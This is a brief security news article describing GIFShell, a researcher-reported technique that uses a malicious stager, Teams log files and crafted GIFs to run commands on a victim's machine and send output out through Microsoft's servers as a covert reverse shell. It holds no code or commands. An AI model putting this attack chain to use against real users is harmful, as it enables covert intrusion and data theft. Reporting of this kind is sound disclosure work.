Researchers have identified a newly discovered malicious technique called GIFShell after abusing the MS Teams. Based on reports, the tool’s operators could use this strategy to deploy phishing attacks and perform commands through GIFs.
The primary component of the attack is a GIFShell that could enable an actor to manifest a reverse shell. The reverse shell could disseminate malicious commands through Bas64 encoded GIFs in MS Teams and steals output through GIF from Microsoft’s servers.
The GIFShell attack tool could create a reverse shell through a webhook.
According to researchers, the attacker should convince a user to install a stager that operates commands and uploads command output in a GIF URL to an MS Teams webhook to create the reverse shell.
To start the attack, the adversary deceives a targeted user into loading a malware executable stager on their systems that will constantly scan the MS Teams logs at a particular location. Additionally, the messages received on Teams are kept in these logs and are readable by all Windows user groups. Hence, it will also be accessible to malware or malicious files on the system.
Once the stager is set, the attacker will make its exclusive Teams tenant and contact other Teams users outside the organisation. In addition, the threat actors use the GIFShell Python script to relay a message to a Team user with a malicious crafter GIF.
The crafter GIF image is an original image file that includes commands to operate on the targeted system.
The message inside the GIF is kept in Team’s log files, reviewed by the stager monitor, and executes the commands on the device. The GIFShell Proof-of-Concept takes the output of the ran commands and converts it to a Base64 text.
The stager will then exploit the text to create a GIF file and maintain it as an MS Teams Survey Card. Furthermore, the attackers generate a URL request for a GIF, an identical name to the GIF file manifested by the stager.
Microsoft would then attempt to recover the GIF file and delivers the malicious GIF that carries the stolen information upon receiving the request.
The researchers have performed the GIFShell attack after running possible scenarios of exploitation. Fortunately, Microsoft assured everyone that they would fix this exploit in their next set of updates.